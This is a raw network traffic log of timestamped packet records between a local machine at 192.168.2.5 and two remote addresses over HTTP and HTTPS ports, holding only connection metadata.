Nov 4, 2024 17:32:10.328586102 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.328628063 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.328722954 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.328735113 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.328747034 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.328788996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.328852892 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.328855991 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.328926086 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.347234964 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.347301006 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.347305059 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.347320080 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.347346067 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.347385883 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.347385883 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.350496054 CET	443	49960	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.350611925 CET	443	49960	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.351088047 CET	49960	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.351192951 CET	49960	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.351212025 CET	443	49960	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.351223946 CET	49960	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.351228952 CET	443	49960	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.354439974 CET	443	49962	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.354656935 CET	443	49962	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.354759932 CET	49962	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.354918957 CET	49962	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.354918957 CET	49962	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.354926109 CET	443	49962	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.354929924 CET	443	49962	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.355019093 CET	49965	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.355065107 CET	443	49965	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.355139017 CET	49965	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.355298042 CET	49965	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.355319023 CET	443	49965	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.357208967 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.357230902 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.357274055 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.357307911 CET	49961	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.357327938 CET	49961	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.357454062 CET	49966	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.357486010 CET	49961	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.357486010 CET	49961	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.357494116 CET	443	49966	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.357501984 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.357512951 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.357598066 CET	49966	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.357719898 CET	49966	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.357733011 CET	443	49966	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.359544992 CET	49967	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.359560013 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.359632015 CET	49967	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.359765053 CET	49967	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.359776974 CET	443	49967	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.364881992 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.364924908 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.364932060 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.365006924 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.365025997 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.365039110 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.365077019 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.410366058 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.410403013 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.410413980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.410487890 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.410804033 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.410882950 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.410914898 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.410927057 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.410969973 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.410969973 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.445640087 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.445668936 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.445688963 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.445805073 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.445822001 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.445854902 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.445859909 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.445873022 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.445903063 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.445903063 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.445919037 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.446073055 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446139097 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446139097 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.446151972 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446197987 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.446197987 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.446317911 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446412086 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446428061 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446450949 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446463108 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446475983 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.446510077 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.446528912 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.446666002 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446686029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446703911 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.446747065 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.446747065 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.447633028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.447700024 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.447720051 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.447720051 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.447748899 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.447760105 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.447829962 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.447875977 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.447885990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.447901011 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.447940111 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.447940111 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.447987080 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.447999954 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.448009968 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.448026896 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.448070049 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.448113918 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.466818094 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.466842890 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.466859102 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.466964006 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.466974974 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.467093945 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.484147072 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.484162092 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.484179020 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.484199047 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.484214067 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.484287024 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.484321117 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.529742956 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.529783964 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.529803038 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.529901028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.529926062 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.529939890 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.529959917 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.529994011 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.530030966 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.565176010 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565196991 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565210104 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565236092 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565248966 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565264940 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565284967 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565326929 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.565388918 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.565479040 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565546989 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565561056 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565567017 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.565599918 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565644026 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.565804005 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565853119 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.565865040 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565877914 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565913916 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.565918922 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.565954924 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.565954924 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.566205978 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.566257000 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.566277981 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.566294909 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.566354036 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.566354036 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.566565990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.566576958 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.566612959 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.566623926 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.566677094 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.566704988 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.566716909 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.566726923 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.566772938 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.566791058 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.567028999 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.567090034 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.567102909 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.567132950 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.567132950 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.567152977 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.567182064 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.567238092 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.567363977 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.567414999 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.567430019 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.567471981 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.606039047 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606076002 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606091022 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606103897 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606110096 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.606127977 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606142998 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606157064 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606167078 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.606167078 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.606190920 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.606214046 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.606220007 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606235027 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606251001 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.606276989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.606276989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.606306076 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.619062901 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.624830008 CET	49963	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.624849081 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.625977993 CET	49963	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.625983953 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.636414051 CET	443	49964	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.637373924 CET	49964	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.637392998 CET	443	49964	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.637902975 CET	49964	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.637909889 CET	443	49964	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.649074078 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.649151087 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.649171114 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.649183035 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.649194956 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.649195910 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.649295092 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.649295092 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.684307098 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684325933 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684370041 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684381962 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684392929 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684407949 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684436083 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.684505939 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684531927 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.684547901 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.684568882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684585094 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684617043 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684618950 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.684629917 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.684667110 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.684937954 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.684989929 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685007095 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685019016 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685029030 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685043097 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685061932 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685061932 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685080051 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685209990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685223103 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685277939 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685277939 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685367107 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685379028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685389996 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685421944 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685421944 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685440063 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685817957 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685877085 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685880899 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685892105 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685910940 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685923100 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685930967 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685957909 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685957909 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.685985088 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.685996056 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.686043024 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.686043024 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.686562061 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.686589003 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.686602116 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.686618090 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.686635971 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.686655998 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.725403070 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725426912 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725454092 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725476980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725481033 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.725492001 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725512981 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725527048 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725532055 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.725543022 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725558043 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725574017 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725584030 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.725595951 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725610018 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.725610971 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725621939 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.725637913 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725652933 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.725658894 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.725676060 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.725702047 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.751030922 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.751064062 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.751115084 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.751171112 CET	49963	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.751230001 CET	49963	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.765191078 CET	443	49964	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.765491962 CET	443	49964	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.765605927 CET	49964	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.768079042 CET	49963	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.768099070 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.768141031 CET	49963	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:10.768147945 CET	443	49963	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:10.768150091 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.768189907 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.768208027 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.768218994 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.768224955 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.768233061 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.768255949 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.768276930 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.768279076 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.768295050 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.768326044 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.768359900 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.803606987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803643942 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803661108 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803677082 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803685904 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.803729057 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803741932 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803750038 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.803755045 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803764105 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:10.803822041 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:10.803862095 CET	49946	80	192.168.2.5	31.41.244.11
